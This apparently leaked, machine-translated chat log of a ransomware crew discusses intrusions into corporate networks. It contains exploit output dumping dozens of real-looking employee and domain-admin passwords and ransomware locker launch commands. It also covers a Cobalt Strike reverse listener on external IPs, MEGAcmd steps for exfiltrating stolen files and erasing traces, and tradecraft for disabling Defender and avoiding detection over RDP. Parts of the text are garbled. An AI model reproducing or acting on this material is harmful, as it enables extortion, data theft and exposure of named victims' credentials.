but you have to ctrl+c ctrl+v at once, and only then do archiving, because archiving takes a fuckload of time, and copying 1-1.5 minutes, then you can already archive and downloadThe basic difference between OST and PST is that OST files are used to save data for offline use and are stored in MS Exchange Server. Whereas PST files are personal folder data and stored on client's hard disk.
but i could be wrong - it's been a while since i got mail like this - i don't remember but it might have worked you know what
copy and paste it in explorer outlook make a copy near it and return the outlook to the crawlspace) nst xhost is the in and out of the mail pst is confused with nst
nst weighs 16gb - it's copied via shadow
outst weighs 12gb, some hosts have 25gb.
pst is a mail archive
kill the outlook, make a copy quickly and get the copy back
i have a problem with outlook copying mail from a host via smb? i make an outlook copy, then i copy an nst file that weighs 20-30mb - it's copied successfully, but copying is successful, but the file does not appear even after a couple hours i fucked up a couple of archives when i downloaded it from mega not so long ago too...this is a feature of the fpt protocol. break the file into smaller pieces and monitor the plum on fpt if the connection is broken he starts downloading again, it's like a prank and rights, I kick the user who sends the archive to the server, he reconnects instantly, the server deletes the archive and starts downloading again
I removed the rights to delete and all seemed to be normal, in 2 hours, I will tell the server will help? some kind of heisenbug, before only one of the five files behaved as strange as disabling the rights of the user to delete anything in the folder downloaded, deleted, and downloads again ))))[ ](https://stylebrooks.com/group/general?msg=Q8pfTaZX3zAkSuWE6) do not believe me, but with ftp some anomaly occurs
he downloads the whole archive, then just re-connects and starts downloading again and there's $100 for 2TBA so Pcloud lives longer, but they can also aboot it, and it also connects to pclone.why i've downloaded an archive of 100 gig from mega for the second time, it successfully downloaded, then deleted and the download begins to go again? before it was even successfully downloaded, but then deleted a day later if it does not rise - network proaktivka cuts the first vpn up, then the sessionparny, maybe someone has faced similar problems and advise how to be...in general, I threw my addy in the coba and raised the addy to the coba, as soon as I raise the ipn, the network in the coba dies. hello all !yes, I just decided that I packed through 7z, it did not fuck up and no problems assembled the archive in 7z can be set way of encoding What archiver do you use?i understand you can rename it) but you don't want to when you are in a hurry? there is a solution for french fuckin' coding:pray:https://www.sendspace.com/file/cw7h2d - 30 days available i'll send you the info then what's wrong, not enough to fill it thanks you'll have to wait) is filling all hi):wave
maybe someone has a video on ms17
throw pliz :slight_smile: :handshake:by prescribing you mean him and the logonserv?
by creating an asset directory domain with the same name.
``Who has encountered EPC Check fail on SonicWall
If the check (and it often is) only on the occurrence of your machine in the domain, you can bypass it by creating an active directory domain of the same name.
Which domain is needed - can be seen in SonicWall's log
@sargon add please, I'm sure often such a protection which bypassed half an hour hour ... so from the off site you can download the same guys have a client under vSphere ?`ctrl+shift+esc ` - open task manager just wanted to write) decided: in the username was a backslash and it was not shielded normally from this and error@all guys, who got this error when decrypting viam?
I got the hashes with = - at the end decrypted all right, but the ones without gave out the following error:
```
veeam.cs(21,32): error CS1009: Unrecognized escape sequence
``New vpns given to work as well as the collection 2fa codes needed, tentatively should be ready and go in hand by 22nd of MoscowPrimary@all sorry, yesterday was absent for personal reasons
koba clean, with each time just more and more difficult ... when the alt will be online who knows? anyone decrypted passes from SAP? and want to staging the domain (or IP) is written in both fields or only in staging-poley what to do, artkit with detektskogo cost koba clean? I did on this manu, maybe help someone.
`https://www.bussink.net/ad-cs-exploit-via-petitpotam-from-0-to-domain-domain/ `through a pass ticket can get on C$ and do anything, nds shoot for example at the output should be a tgt ticket from DC$ (spn account cd) write down who will be able to untwist to the end of this attack, I do not have the right targets>Exception: Client does not support SMB2
this means that smb3 is usedhttp://github.com/bats3c/ADCSPwnFound the manuscript, but for some reason python script spits this error.
```
Traceback (most recent call last):
File "/usr/local/lib/python3.7/dist-packages/impacket/smbserver.py", line 4281, in processRequest
connId, self, packet, True)
File "/usr/local/lib/python3.7/dist-packages/impacket/examples/ntlmrelayx/servers/smbrelayserver.py", line 149, in SmbNegotiate
raise Exception('Client does not support SMB2, fallbacking')
Exception: Client does not support SMB2, fallbacking
``Gentlemen, hello there.
Has anyone been smoking this?
``https://github.com/topotam/PetitPotam``@all
folks, has anyone localized the nix servers (ubuntu, debian)
if you give the command
./encryptor --path / --prockiller
from root
then lock the entire server with the system files (passwd, shadow, sshd as an example), actually slow down skl, apache and other services and their lockant and the server will be unavailable? yes ok give the full composition of hell from here should seeomuchomu in a privately not see your messages, and in groups all normal wait 10-15 minutes will attach you to someone else, I remember hey hey, I am the new admin. have any work to practice? Tomorrow at 7 gathering will be fine In 3-4 rounds in 12 hours we can start now 8 am what time we will close the network @alter need a build102 gb62 gb already downloaded ``gic\administrator G3n3r@l1$
gic\atgadministrator @ltt3ch$
gic\s-365 G3n3r@l1$
``````Members
-------------------------------------------------------------------------------
Administrator atgadmin AtgNet
BSchlegal s-365
The command completed successfully.
``Pumping started jumping ?-yeah windows will finish them there just 400 pieces everything will be yes I just vorki pinged put@Air brother let's jump take the balls and unload them here at the entrance of the admin caught well here somehow izidajte jumpzatel[+] 172.22.9.18:445 - 172.22.9.18:445 - Success: 'gic\administrator:G3n3r@l1$' Administrator
[+] 172.22.9.5:445 - 172.22.9.5:445 - Success: 'gic\administrator:G3n3r@l1$' Administrator
[+] 172.22.9.3:445 - 172.22.9.3:445 - Success: 'gic\administrator:G3n3r@l1$' Administrator
[+] 172.22.9.17:445 - 172.22.9.17:445 - Success: 'gic\administrator:G3n3r@l1$' Administrator
[+] 172.22.9.196:445 - 172.22.9.196:445 - Success: 'gic\administrator:G3n3r@l1$' Administrator
[+] 172.22.9.2:445 - 172.22.9.2:445 - Success: 'gic\administrator:G3n3r@l1$' Administrator
[*] Scanned 6 of 8 hosts (75% complete)
[+] 172.22.9.24:445 - 172.22.9.24:445 - Success: 'gic\administrator:G3n3r@l1$' Administratorknow sb prognosticating pingnutsperer
172.22.9.18
172.22.9.17
172.22.9.5
172.22.9.196
172.22.9.9
172.22.9.2
172.22.9.24
# Lady, you haven't pinged yet? # # If not, let's ping pong access # # Wouldn't it be nice if we could get the admin to ping pong? # pid it's my dedic185.150.189.202 koba we kinda have an admin first we're interested in servers can you run smb login 15 servers and 402 vork[ ](https://stylebrooks.com/group/generalinsulation.com?msg=p4dd4ySGDjecmh9g2) hello , help what? okvpn up now i'll raise the vpn and run everything on smbokytevin gobbyvampir guys gobbytu i guess domain admin at the entrance directly
```
[+] Checking URL https://69.84.159.94
[+] Found latest version (9.x+) of SMA appliance
[+] Appliance running version 10.2.0.1-18sv
[+] Leaking sessions to dump configuration.
[+] Found: SessionID: 0agye8ssdBaNcrk6Zl0WqVCxdNYplgJ5gBlRAMhUlEA= userType: 1 userName: dlyons Password: maggie1999 Domain: GIC.Local
[+] Found: SessionID: 0y3mQ3Y1Nf1DhqnUW5N0wI6BX7DkSqkbMvvs0e7g8g8= userType: 1 userName: ecasterline Password: maggie Domain: GIC.Local
[+] Found: SessionID: 3u0H0cRw90px9P8w6EzfSMDix5nE0EUueuAYNM4U02U= userType: 1 userName: pdonovan Password: #32Wilkins# Domain: GIC.Local
[+] Found: SessionID: 4N6urKz1seDuCRwnBe1RlvtwKrXpRhqoGoStFime3cLM= userType: 1 userName: dsweeney Password: Welcome123$ Domain: GIC.Local
[+] Found: SessionID: 5WMU0MCfO1HoETuBIPbCA8LDug0Su8hL9UVR4u1P100= userType: 1 userName: speschl Password: Walleye5252! Domain: GIC.Local
[+] Found: SessionID: 9sIZQSAJ4YZ391RLGh86y4cAqVAeU09BdfAy6N8FaK8= userType: 1 userName: dferdinand Password: jessica Domain: GIC.Local
[+] Found: SessionID: AHpEryyF019muOFFJwkke7moSfaB12pM4am7xTUEQh7o= userType: 1 userName: tmeegan Password: Bassman1! Domain: GIC.Local
[+] Found: SessionID: AJPLSQg1gpryzZOG0sovAedr9GctS1seHcGYTDk8Bek= userType: 1 userName: msnodgrass Password: Husmuog@1980 Domain: GIC.Local
[+] Found: SessionID: DWOjoF2e6oP6kvRKDjslkJCOi9WY80TAgwj1eSeKtiU= userType: 1 userName: wbrooks Password: Grace123$ Domain: GIC.Local
[+] Found: SessionID: EiyHS96h47h544VyrFpwzaigmdT7l9PFOXBDCa7idfs= userType: 1 userName: mclinger Password: bosox Domain: GIC.Local
[+] Found: SessionID: FeP72wVY8uhKgQgR1vaJwkTKw5VG3s1KOJvvKm6xQI= userType: 1 userName: rrenaud Password: trymer Domain: GIC.Local
[+] Found: SessionID: GbsIiEmyryOMSas8qR9xAgc3hceH60znCnVWIo32Gc= userType: 1 userName: dmidura Password: trintrin49 Domain: GIC.Local
[+] Found: SessionID: JpyHlguSmyzdo5PdsflWpJSR9YOtJXiF6FUNy4cD03c= userType: 1 userName: mgonzalez Password: Warmup90! Domain: GIC.Local
[+] Found: SessionID: K2C27y1YPPhgkD2A5KZdrtcJqL8kWZVMzXEuDWkUwQ= userType: 1 userName: mcollins Password: Sandycjr5# Domain: GIC.Local
[+] Found: SessionID: K93x9o5n5E8pCMXlcZ7Q3AUWaFm9wLvYjjWdSqnvqdI= userType: 1 userName: jmoore Password: 1oliviaZ Domain: GIC.Local
[+] Found: SessionID: L7yJQQCujzM3qJiBoR1jWtDmTInBNhqIeFo0bvEsC6o= userType: 1 userName: fr2granara Password: frank25 Domain: GIC.Local
[+] Found: SessionID: Ov17M0I1P0E0wNfYhQC0eH9NQM0lqOZCOA6Jpaiekus= userType: 1 userName: gtowle Password: Drifters2$ Domain: GIC.Local
[+] Found: SessionID: PtTgV72emTIxe04dvnF2WTyuEGNb0S7qPEaFDFTTxHg= userType: 1 userName: rcampbell Password: alex11 Domain: GIC.Local
[+] Found: SessionID: QBDBUhXvWk1jyBX7xNBK5qc5VFHteEvn1pFtE1LjVAQ= userType: 1 userName: cmarmaduke Password: customer Domain: GIC.Local
[+] Found: SessionID: QDsmuPP7OAnWyOOubJQQyZHdlGvAd0dSG7zW0MTRUKM= userType: 1 userName: wgardiner Password: Melrose2 Domain: GIC.Local
[+] Found: SessionID: Wcr9AaobUMuJUXwISbBZBvsuoyJ1s7iMhbq5d0iKcDY= userType: 1 userName: barcure Password: willieb17 Domain: GIC.Local
[+] Found: SessionID: ZR21V7zgJXk60SBi7dcxfsVyQMQTWt88jQlZOH0UQWg= userType: 1 userName: lraab Password: Floorplan18 Domain: GIC.Local
[+] Found: SessionID: axlkOmu2994Gep7JspYjuqtL4ZkpV91yaQaTzc0LVo= userType: 1 userName: esheara Password: Freddyc256 Domain: GIC.Local
[+] Found: SessionID: dP7r6R7kKD58IiZ0djlSTNguhsxZcMzr0KRJ4A40fXg= userType: 1 userName: aoral Password: @nthony1 Domain: GIC.Local
[+] Found: SessionID: eQwhnplhToF16fqjkJjzgxvVtduIBON0qz3CtuEe6zk= userType: 1 userName: mcoleman Password: coleman5912 Domain: GIC.Local
[+] Found: SessionID: f4Kqq8okWmvVbQb1zscKa0naph4EQBF2PrxdD4X17qnuw= userType: 1 userName: kcarabello Password: Nicnkay7* Domain: GIC.Local
[+] Found: SessionID: fdWOLpEau4d95qsAASBb1DGPVFvPhTv9DD0pEV8WlA= userType: 1 userName: plenzie Password: Blizzard1 Domain: GIC.Local
[+] Found: SessionID: h5K7GKiSNw0iFC4w0FyvoBEiaL3nS1Y3UO1Z6tNDVAw= userType: 1 userName: ncseresznye Password: Welcome123$ Domain: GIC.Local
[+] Found: SessionID: mWusU4dFejfPKNb5D1WJ6toR97y1yG41M9kBcjXNhcs= userType: 1 userName: hkoenig Password: Welcome123$ Domain: GIC.Local
[+] Found: SessionID: q1RmZkd1esnMrzVra3RRMkznBL0JMpyRyQS1mcxMm5Y= userType: 1 userName: fquieti Password: cheryl3272 Domain: GIC.Local
[+] Found: SessionID: qW11OtThcdntTddSEI7g0d01sQm4fkPqp9kTrdoXgoQ= userType: 1 userName: tbowen Password: Hadley123 Domain: GIC.Local
[+] Found: SessionID: rbpQCm9CTSAEWhJfgXfFk6qwCoiYQVW79wyldz7yC6Y= userType: 1 userName: kthibodeaux Password: benjamin01 Domain: GIC.Local
[+] Found: SessionID: uzjxsaL7Y1Aildxvh3De1ZnxfGlpgg0MzfUyUye19YA= userType: 1 userName: pbinkley Password: madison2001 Domain: GIC.Local
[+] Found: SessionID: vmuFiC3uYrByDgZjIqaUR1xskukOGZJP1ChbVp2xF2Y= userType: 1 userName: cridenour Password: R!denour1 Domain: GIC.Local
[+] Found: SessionID: ydcQvPYrdE7LrcCOXC97C0J1ClmYW321Q1v2ou9Q20VU= userType: 1 userName: jcoleman Password: rosebud4898 Domain: GIC.Local
[+] Done with https://69.84.159.94, found 35 sessions
35
[+] Saving session data
[+] Trying session 0agye8ssdBaNcrk6Zl0WqVCxdNYplgJ5gBlRAMhUlEA=
[+] Saving config to ./Dumps/69.84.159.94/config.sqlite
[==================================================]
[+] AD creds administrator:G3n3r@l1$@172.22.9.3
```
``Additional feature added to the option to run the locker, which removes some of the AV detects when dropping it on the disk
Startup via regsvr32
```
regsvr32.exe /s locker.dll - without arguments
regsvr32.exe /s /n /i: "here arguments" - with arguments
```
This update has brought a need to change the entry point, so all builds, which were issued before February 8 with the new fresh versions of BOOFs will NOT work!
please when preparing new cases to take the NEW builds with the NEW BOOF files injector@all download and scrdate there is such a toolzagle pg adminsxxxxx
no tips) who can tell me what would work in msf utility msf5 > db_nmap to scan the ports what and how to raise the need in ipso in Ubuntu?
right now on startup it gives out
``[-] Database not connected
```
i need to raise the base on postgres type - who can tell me commands to run postgres and create a base, what would this machine work)?Air:metal:I am also glad to be with you)glad to see you in our circles:metal:hh:v:hhy spunoktam there are instructions and vidosat for starters read the branch of Generalstevan tell me how to start well acquainted with the guys so farshetope will soon be setsroon servers you orderedreetreetreet @sroonreet all hi I am new to you 30minutilizov. Grid is there bro ?all hello okay hey hey guys I will be in 3-4 hours fully I have reinstalledscould try to reboothhhz what is it too here @steven even can not connect all hellohey hey bro:joy:at least one here hello )how are you doing? hope all the fire all hey bandat.e connection to the cob on the domain?the route is when the cobalt is bolted to the domaing let's see i step back an hour and a halfaha, looking for shahrabrad let's see passa hi hi all hi banda hi , what is the route , i think i have without , since i work as of originally given a simple ip vps server , i certainly do not directly cling to it .., but still explain about plokladki plz) gentlemen, who have servers without gaskets - please write down the name)) dataevolution directly necessary104.243.46.74 443mne too netz plz
104.149.168.199 443)) steven now coming) with what to work there is (steven sitting idle since yesterday:zany_face:hello hello:smiling_imp:hello gangFurymario:joy:llovely bros/beacon_https/reverse_https 142.202.205.88 443 142.202.205.20588i listenerenerenerenergyafterwards I'm going to workoutafterwards guys who are online all crossed fingers:smiling_imp:hello there is ok guys:metal: how is this week going to go? hello! I want to finish my workoutafterwards we will pick something up hello hello Steve, what do I have to do? I downloaded the files, but we'll get into prodhai sonar:metal:helloBrendon:metal:kkprivetag altera wait for the week was not ace all hello gangZdhai brendon will work today ?i can't find anything i like so i just got here and i don't know if it's okay we will think about it today so i will do it now tell me what's going on at work today. On any resource can I rent and raise ?((we are waiting for the guys tomorrow progruzhey be online in 30 minutes will give networks:D:laughing: :joy: :joy:well leave them on the bottles of whiskey from their money when they pay ) :joy:do not forget about the tips :-D handsome guys be online guys I still very busy zdarovarov:v: hi hi guys:metal:kkya aftk for 20 minutes guys bots I'm waiting now sent to progroukkk5 minya tutochkiha smoke pendohal bye++++++ guys who are in the studio opisheeshas all the tasks yes, wanted to dig, or what to do if memory serves you there on your own car admintak there we were caught in the kerd, or what to do?)Hi, I will do a lot of pointers so guys who do what to do hello broooooooooooooooooooo we are all waiting for the curators then)I hate Mon finally solved all the cases with a pity) Mon is a hard dayhome someone showed up hello brooprivetau:rolling_eyes:taak, and where is the dispplina? i hope the beginning of a new week will be productive.secdaily ?or generate you a couple zakrepov ? aha Brandon if anything jump to winlogon if you come updo tomorrowokbuduemo for today offkya in placeokkya afk for 1-2 hours and will be up until morning in us seekkakoya there antivirus, etc all be prepared to lock today kamupus go to prodPriyat
ecampus.com.
got the info, what to do next.
systemtechnologyinc.com
Gatherinfiku who and where zatupy so let's go through the networks all hello sopunovoy will give today will be taught it is the very start search for servers through the domain controller, collecting information on AD: users, computers, groups search and sorting users, ipis, search sharsborov it what?i got it, i can't find it @all i need two builds with nix version and eshi - the last oneokay
I'll do something now
you without tasks? 2 more in the process of negotiating what the fuck is the news from k12 all hello, what news? ok, wait for tomorrow will be good guys, when the work to expect?and something else I do not remember all wait for networking with 2 sesti also call scammers from sbera say let's toss the k12 talks do not piss wait for the download download download wait for work? hello there are no work yet?guys have any idea when it will end ? wait for the download steve, today there will be work ? hello yes there will be work today ? hello hello everybody hi ! tomorrow either vpn or session i think that tomorrow the networks will be tomorrow guys are downloading as something will be i message wait for the silence again ? hello will watch hello hello today will be anything ? hello everybody ! thanks just or staskom, should work manson thank you !
Samuel, send me the batik, if it's not a problem) hello. can you try to disable with the batik. is it realistic to do without pvershell and without rdp? guys, who disabled vindefender through cmd (shell) on a remote machine? openvpn with killswitch
>
nordvpn
privatemyaccess
I've seen a couple more of these on some publika providers.
Who set up a Kill Switch + Open Vpn? with docx there need to unpack it, and then put it back on the placeportablpiton nakatiea I have never linbla, it linbla should be put + SharpChrome / Firefox passwordsA highly recommend ))))) or rather not recommend itRecommend if possible all NTDS by 200 lines dekripto. I often got passes from chrome + ntds. literally on the CPU for a few seconds).atdushiHash the curator and he will give the decrypt to http://null-byte.wonderhowto.com/how-to/crack-password-protected-microsoft-office-files-including-word-docs-excel-spreadsheets-0193959/cookie this, .docx is password-protected, anyone know how to open ?only in msfv kob it does not knock the password string last `shell net user admin /domain
``How can I see in the cob when the username has changed the password ?white hello, I do not have any notifications, keep the sound down and fire angry with the fact that really when there is a controversy, half the screen is flooded with notifications if you know everything, well done, we are newbies and we need all these discussions in order to learn and become better:smiling_imp:red why angry then, turn off the sound thentut and it should discuss itmasters conspiracy, give theories about SORM, etc. in private) and so constantly knock messages did not hear about it how?only after vpn\soxy I never connect directly to the torus here config, I think you'll understand what to change)
```
#!/bin/bash
/sbin/iptables -F && \
/sbin/iptables -F -t nat && \
/sbin/iptables -X && \
/sbin/iptables -P INPUT ACCEPT && \
/sbin/iptables -P FORWARD ACCEPT && \
/sbin/iptables -P OUTPUT ACCEPT && \
/sbin/iptables-save > /dev/null
/sbin/iptables -P OUTPUT DROP
/sbin/iptables -A INPUT -i lo -j ACCEPT
/sbin/iptables -A INPUT -m state --state ESTABLISHED, RELATED -j ACCEPT
/sbin/iptables -A OUTPUT -o lo -j ACCEPT
# ip ot podpiski 183.30.41.59 our = 83.193.11:210
/sbin/iptables -A OUTPUT -o eth0 -d 83.193.11:210 -j ACCEPT
/sbin/iptables -A OUTPUT -o wlp3s0 -d 83.193.11:210 -j ACCEPT
/sbin/iptables -A OUTPUT -o tun0 -j ACCEPT
/sbin/iptables -A OUTPUT -m state --state ESTABLISHED, RELATED -j ACCEPT
```[joy]``not unloads but relaxes[ ](https://stylebrooks.com/group/general?msg=4c2HNDbifNHby5q9P) well, you be careful with that kind of question :)who how relaxes himself guys:joy:happy to know who's having fun dunhill blue:smiling_imp:test *okay, the test passed) i don't smoke them again cones ? alex, rosette, ragnarok, mansonya work to smoke, who with me:grin:+++the topic is relevant to all) idle guys, and the time is 1 a.m. - no work? :) we're poor people, we live in rentals, drive tazas, wear clothes from the chinese:zany_face:guess =)))))))again, only when you have money, the motherland finds reasons to squeeze))) fuck, who the hacker here who has the new gelendagen on the districthuminescents change modemswas much easier to figure out will not sim and on the device, and not all devices change imai, so you better immediately and modem / router changejoy:that's true, I do not know why we should be interesting here =) we're doing our best for our country!i would have to take a router with a SIM card and also change the username when switching SIM cards, would that be ok?you with a smirk said with a smirk) change of SIM card will not do anything unless you have different phones, and you use only trolley and all through VPN, it's better to change the modem once a month? i have not been approached) and the change of SIM card once a month does not work +[ ](https://stylebrooks.com/group/general?msg=6CbYQvhqTuGpaNvQb) no sense to change the location if you carry a mobile with you, imai devices mobile + imai modem will all the time nearrazetka and you knocked in the masks already?))) but shhh :) to the kitchen once an hour gde) workplace, or poh? guys tell me how often you change location?supports ðrnache to the adapter vpna virtual can mount) as altertaiva khuniksu virtual router pfsens very convenient to manage traffic virtualokda normal theme, checha) the main thing ipiteibls config saveeda, normal theme with scriptotam through iptables done if someone needs to give the script can bash, You can change it by your hands and you will have a ready to use config to let the traffic through 1 ipi, select your input VPN as ipi, and the traffic goes through it only, if your VPN goes down, the traffic will not go past it. Norm theme. put isikoroch zaroutat traffic through the root in the vpn what killsvitchet same is simply a couple of nodes add and change from time to time, che =) worked off a couple of grids - change.not that snifet, and the logs are like the central routers remain what your VPN and the difference in security from the public[ ](https://stylebrooks.com/group/general?msg=L43qA8SHeW6DkKTy) convenient?) skidyl, but I'm like that all my own doing it all hz) alter gril that you can protect against dropping traffic literally there 4-5 strings vaktya like ssh gave, setapni, pochekal - all ok) no instructions. contact can share admin local setapil. protection against dropping trafficnalogue for VPN. ahaasvoivpn own? a separate laptop
on the laptop only the virtualizer and the hoonix analogue
then for each thing a different route + - in the end, it is kind of like a dedicated server to take, put the virtualization + encrypted boot sector crypto, the key for the decryption is stored somewhere in the memory, then it can be dumped as a result there do wpsvatschete if ok then just advise services or countries without logs does not happen =) without logs and bs bitmomething not to store anything on their virtualkuPlease advise services vsdushki in the wind also utilitiesdisk party is linuxmuzhiki i can't find it, i can't use it, i can't find it in the list of processes, i don't know what to do, i can't send commands to it, and i don't understand it, i can't use it in the list of processes, i can also try to break into a folder i put a token yes, october file browser, try to break into a server, sometimes i put a token on, it says that the system, but in fact the token is on, how to make sure that the token is put on? say, if I sit under the system:thumbsup:agreehttp://www.zerodayinitiative.com/advisories/published/ speaking of zero day vulnerabilities, a good resourcehttp://www.secura.com/blog/zero-logonновая hole in the asset directoryDo it on dk? after that everywhere def knocked out. much more convenient batiko+` ``gpupdate /force
``-------To knock out the defender via the GPO
https://www.prajwaldesai.com/how-to-turn-off-windows-defender-using-group-policy/+all traffic is encrypted, no detecting and we can ping, snoop, roam, throw port to the outside of the LAN =) the diap what to do and what to put there (1 command is ideal) so in short I think you can even localize through this ccj + you can roam on computers in search of files upload ccj client no problem with handsrms, well, run it out and make it simple =) ------------------Kill defender in bulk
``https://www.prajwaldesai.com/how-to-turn-off-windows-defender-using-group-policy/
``https://spy-soft.net/vpn-tunnel-windows-linux/
this guy's manualVPN tunnel over SSH (L2/L3 tunnels)``https://xakep.ru/2020/09/08/windows-pivoting/
``Guys, any networkers? VPN over SSH can someone collect up to 1 command? very cool will help everyone ... if the archive is pulling too much traffic? here yes, well, as an alternative, you can split into separate archives, I downloaded the archive of 2gb, everything went fine this archive with a bunch of dllos, fill it then ekstractym in the folder mg, here do not load so download from the link:
https://mega.nz/file/G4wzjYxI#oVtJtRACPNiQEMLYaqa88Fx7UzqSbEAlv0dULAYo6gg--- If you need to download many heavy files from the ball, it will take a long time to pull them through coba, you can unzip them to mega using megacmd, ---
Pre-archiving files into zip
```
MegaNZ usage
1) Create folder for files
2) Uploads exe and dll files to created folder
3) Start background MEGAcmdServer.exe
4) Use the commands:
> MEGAclient.exe update --auto=off # disable autoupdate for megacmd
> MEGAclient.exe login login password # init session by creds
> MEGAclient.exe # check connection
> MEGAclient.exe put -q --ignore-quota-warn test.txt # upload file to acc storage [-q background process]
> MEGAclient.exe ls # check remote directory
> MEGAclient.exe logout # end session
> MEGAclient.exe quit # kill MEGAcmdServer.exe
5) Remove special folder for MEGAcmd.
6) Remove update task from schtasks:
> schtasks /query /FO list | findstr /i "mega"
> SCHTASKS /TN "\mega\ FULL NAME HERE" /DELETE /F
example:
> MEGAclient.exe update --auto=off
Automatic updates disabled
> MEGAclient.exe login supertest@mail.test P@$$w0rd
log in
> MEGAclient.exe whoami
Account e-mail: supertest@mail.test, check our account
> MEGAclient.exe put -q --ignore-quota-warn C:\temp\test.txt
upload test.txt
> MEGAclient.exe ls
test.txt, check what files already uploaded
> MEGAclient.exe logout
Logging out...
> MEGAclient.exe quit
close megaclient
> schtasks /query /FO list | findstr /i "mega"
Folder: \MEGA
TaskName: \MEGA\MEGAcmd Update Task S-1-5-10-1145623454-6237456245-1243533621-3000
> SCHTASKS /TN "\MEGA\MEGAcmd Update Task S-1-5-10-1145623454-6237456245-1243533621-3000" /DELETE /F
Then you can also check with tasklist, and use taskkil to kill the mega process
``YeahYeah, right!
Not always the truth these accounts RDP is included, but in our cases while digging - it works quite well)@addition, always have to climb service acom, much less % under it will climb to this service, acom respectively not SQLLLXXXXADMIN) and the team installadmin, winadmin and so on ------------------- If you really need RDP in the lock :: HOW NOT to LOSE ::
1. Choose a server OS , ping, found. Do a dir listing
``ls \\\\\REMOTE-HOSTNAME\C$\Users``.
Sorting by Modified. Where there is a fresh touch - under these users definitely DO NOT log in because it's easy to get the following situation - you came in, downloading balls/testing something and suddenly this user logs in to this pc and sees your results... Detect. Cleaning. End game.
To do this, select a polzak who on this server went last year, say.
I think the mechanics of it is clear?
2. Select polzak from YES, which hangs in YES, but almost never used
``hell net group "Domain Admins" /domain``.
This is a list of our licenses.
Next, we skim the user information one by one
``hell net user Administrator /domain
Look for Last Logon line - i.e. last time he logged on the network (on any of the PCs in the network)
If there is a date like the month before last month, half a year or even a year - great. That's what we need. Most likely it is either a service account or admin they do not go and you on the RDP, he certainly does not bother.
These are simple tricks that will help you not to get caught on the RDP
3. Do not linger on RDP, after you have finished - do Logoff (MUST). Not to be confused with just closing RDP window.
=):ok_hand: )friends, I'm very busy, today I will be a little later than usualHow to decrypt the real one, looks like HEX but no wayMicrosoft_WinInet_192.168.0.10:80/** 65490 *\backup 01 00 00 00 d0 8c 9d df 01 15 d1 11 8c 7a 00 c0 4f c2 97 eb 01 00 00 00 00 c7 71 71 3d cf 77 84 c6 43 9c 78 9f b3 75 8c e6 be 00 00 00 00 18 00 00 00 57 00 49 00 4e 00 49 00 4e 00 45 00 54 00 43 00 72 00 65 00 64 00 00 00 03 66 00 00 c0 00 00 00 10 00 00 00 2c f7 67 9b f6 85 ad 39 97 e0 40 3a 36 7e 45 99 00 00 00 00 04 80 00 00 a0 00 00 10 00 00 00 67 22 c8 7b 4e f1 2b 80 59 3e 1d 02 f9 bc 0c e6 20 00 00 00 00 bc 0a c5 ab 6e 3a a7 05 8b 5a ce 75 2b b9 9d 63 c8 78 ac 4b 04 8e e5 cc 8a 4a 4a fc 0f ac 3a 5e 54 14 00 00 00 ba b6 a2 32 76 da 02 73 a7 60 f1 7f 93 c6 78 6a 82 32 26de does anyone know what this is from mimicry?
MSIX-Skype for Desktop/live:dudurech90_1\live:dudurech90_1 7b 22 72 61 77 54 6f 6b 65 6e 22 3a 22 65 79 4a 68 62 47 63 69 4f 69 4a 53 55 7a 49 31 4e 69 49 73 49 6d 74 70 5a 43 49 36 49 6a 45 77 4d 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 70 59 58 51 69 4f 6a 45 32 4d 44 6b 77 4e 6a 63 34 4d 6a 59 73 49 6d 56 34 63 43 49 36 4d 54 59 77 4f 54 45 31 4e 44 49 79 4e 53 77 69 63 32 74 35 63 47 56 70 5a 43 49 36 49 6d 78 70 64 6d 55 36 5a 48 56 6b 64 58 4a 6c 59 32 67 35 4d 46 38 78 49 69 77 69 63 32 4e 77 49 6a 6f 35 4e 54 59 73 49 6d 4e 7a 61 53 49 36 49 6a 45 32 4d 44 6b 77 4e 6a 63 34 4d 6a 55 69 4c 43 4a 6a 61 57 51 69 4f 69 49 7a 5a 47 55 79 4f 47 51 35 4f 44 63 7a 4d 54 4d 78 59 6d 55 31 49 69 77 69 59 57 46 30 49 6a 6f 78 4e 6a 41 32 4f 54 4d 79 4d 44 49 35 66 51 2e 52 71 53 75 7a 74 32 77 51 65 4a 79 4d 51 69 5f 78 68 6e 62 79 68 47 35 62 59 38 30 66 6b 4b 58 67 7a 42 68 54 79 73 64 42 66 68 30 5a 34 32 66 48 57 4a 4c 57 58 6d 76 65 54 4d 5f 67 48 32 58 42 4f 4a 61 6c 32 6d 76 46 34 71 61 67 55 76 57 46 70 42 31 2d 61 65 6f 63 4b 2d 49 66 58 34 41 4b 70 4c 54 5a 43 30 73 37 4d 48 32 52 30 73 44 49 78 6c 4b 4c 6e 33 68 77 34 57 46 7a 56 74 4d 4b 70 55 67 47 58 69 37 65 53 55 50 65 37 39 44 53 65 59 52 55 7a 37 46 59 49 41 68 36 4d 71 75 6c 6f 41 5f 37 4f 6c 76 4b 66 6b 6a 46 69 39 55 49 32 30 45 6c 67 70 32 59 6e 6a 4d 71 37 52 72 63 54 49 76 4d 51 68 6e 79 33 70 32 6b 51 46 6a 6e 6e 78 4d 30 68 4a 75 6e 79 66 53 6d 69 38 33 63 38 46 52 4a 31 37 6b 4f 42 53 6b 2d 69 62 63 34 36 47 30 79 71 37 59 4b 76 79 74 6e 62 56 31 4f 74 42 4e 4c 41 54 4d 63 75 4d 48 59 48 68 5a 6d 74 44 39 4c 68 42 4a 61 50 6b 6e 4a 4f 6a 34 61 44 53 58 55 69 72 79 47 58 34 67 32 2d 68 46 5a 4c 4c 31 31 6f 44 67 76 77 41 36 69 50 67 4e 67 53 53 52 37 75 30 42 47 64 45 4f 72 47 71 4a 66 70 32 51 22 2c 22 65 78 70 69 72 61 74 69 6f 6e 22 3a 31 36 30 39 31 35 34 31 31 37 30 34 33 7d 00 00 00 00 00 can you extract the account from the sloud acronis agent?hi, if someone has difficulties with the lifting of the session through the rdp can try to drop me a line. so far only where there is rdp11 if memory serves zhava need try to put a normal password on the archive and change the file format, so it is not lit as an archive is not network technically can not
except to archive directly on the host where the logical drive is partitionedparni, is there any way not to spam network traffic when you make archives with the ball?
it's like one and the same, but they fuckin' spam the traffic, and in good corporations you can't make big archives for uploading. how to dump the base on a local server? who has faced with bases in azuer? chrome sees it, but writes about the certificate, the problem with the sonic does not see it through firefox, but through Edge does, I do not understand why...Hi, everybody. Please advise plz according to the manual SonicWall
Open incognito browser and open the console (i.e. the blank page initially, or should I go into sonic and enter the credentials?)
